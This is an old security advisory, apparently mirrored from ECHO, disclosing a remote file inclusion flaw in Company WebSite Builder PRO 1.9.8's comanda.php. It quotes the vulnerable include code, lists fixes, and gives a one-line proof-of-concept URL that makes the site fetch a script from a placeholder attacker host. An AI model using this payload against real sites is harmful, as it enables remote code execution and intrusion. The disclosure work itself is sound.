[ECHO_ADV_76$2007] Company WebSite Builder PRO (INCLUDE_PATH) Remote File Inclusion Vulnerability

2007-03-1700:00:00

vulners.com

JSON

ECHO_ADV_76$2007

Author : Dedi Dwianto a.k.a the_day
Date Found : March, 15th 2007
Location : Indonesia, Jakarta
web : http://advisories.echo.or.id/adv/adv76-theday-2007.txt
Critical Lvl : Highly critical
Impact : System access
Where : From Remote

Affected software description:


Application     : Company WebSite Builder PRO &#40; CWB &#41;
version         : 1.9.8
URL             : http://www.grafxsoftware.com/

This software makes it easy to build an e-commerce site that processes credit cards, 
wire transfers. This is a great Content Management System that&#39;s easy to install and use WITHOUT having 
to FTP upload pages every time they need to be updated.
---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~

- Invalid include function at comanda.php
-----------------------comanda.php------------

&lt;?
...
include&#40;$INCLUDE_LANGUAGE_PATH.&quot;$LANG.inc.php&quot;&#41;;
include&#40;$INCLUDE_PATH.&quot;connection.php&quot;&#41;;
include_once&#40;$INCLUDE_PATH.&quot;connection.php&quot;&#41;;
include_once&#40;$INCLUDE_PATH.&quot;cls_produs.php&quot;&#41;;
include_once&#40;$INCLUDE_PATH.&quot;cls_left_menu.php&quot;&#41;;
include_once&#40;$INCLUDE_PATH.&quot;cls_stire.php&quot;&#41;;
include_once&#40;$INCLUDE_PATH.&quot;cls_orders.php&quot;&#41;;
include_once&#40;$INCLUDE_PATH.&quot;cls_headline_prod.php&quot;&#41;;
include_once&#40;$INCLUDE_PATH.&quot;cls_checkout.php&quot;&#41;;
include_once&#40;&quot;cls_download_products.php&quot;&#41;;
....
?&gt;
----------------------------------------------------------

Input passed to the &quot;$INCLUDE_PATH&quot; parameter in comanda.php is not
properly verified before being used. This can be exploited to execute
arbitrary PHP code by including files from local or external
resources.



Proof Of Concept:
~~~~~~~~~~~

http://localhost/cwb/comanda.php?INCLUDE_PATH=http://atacker.com/inject.txt?


Solution:
~~~

- Sanitize variable $INCLUDE_PATH affected files.
- Turn off register_globals

---------------------------------------------------------------------------

Shoutz:
~
~ y3dips,moby,comex,z3r0byt3,K-159,c-a-s-e,S&#96;to,lirva32,anonymous
~ Jessy Nice Girl
~ az001,bomm_3x,matdhule
~ [email protected]
~ #aikmel - #e-c-h-o @irc.dal.net
------------------------------------------------------------------------
---
Contact:
~
     EcHo Research &amp; Development Center
     http://advisories.echo.or.id
     erdc[at]echo[dot]or[dot]id
     the_day[at]echo[dot]or[dot]id
     
-------------------------------- [ EOF ]----------------------------------

JSON

[ECHO_ADV_76$2007] Company WebSite Builder PRO &#40;INCLUDE_PATH&#41; Remote File Inclusion Vulnerability

Author : Dedi Dwianto a.k.a the_day Date Found : March, 15th 2007 Location : Indonesia, Jakarta web : http://advisories.echo.or.id/adv/adv76-theday-2007.txt Critical Lvl : Highly critical Impact : System access Where : From Remote

[ECHO_ADV_76$2007] Company WebSite Builder PRO (INCLUDE_PATH) Remote File Inclusion Vulnerability

Author : Dedi Dwianto a.k.a the_day
Date Found : March, 15th 2007
Location : Indonesia, Jakarta
web : http://advisories.echo.or.id/adv/adv76-theday-2007.txt
Critical Lvl : Highly critical
Impact : System access
Where : From Remote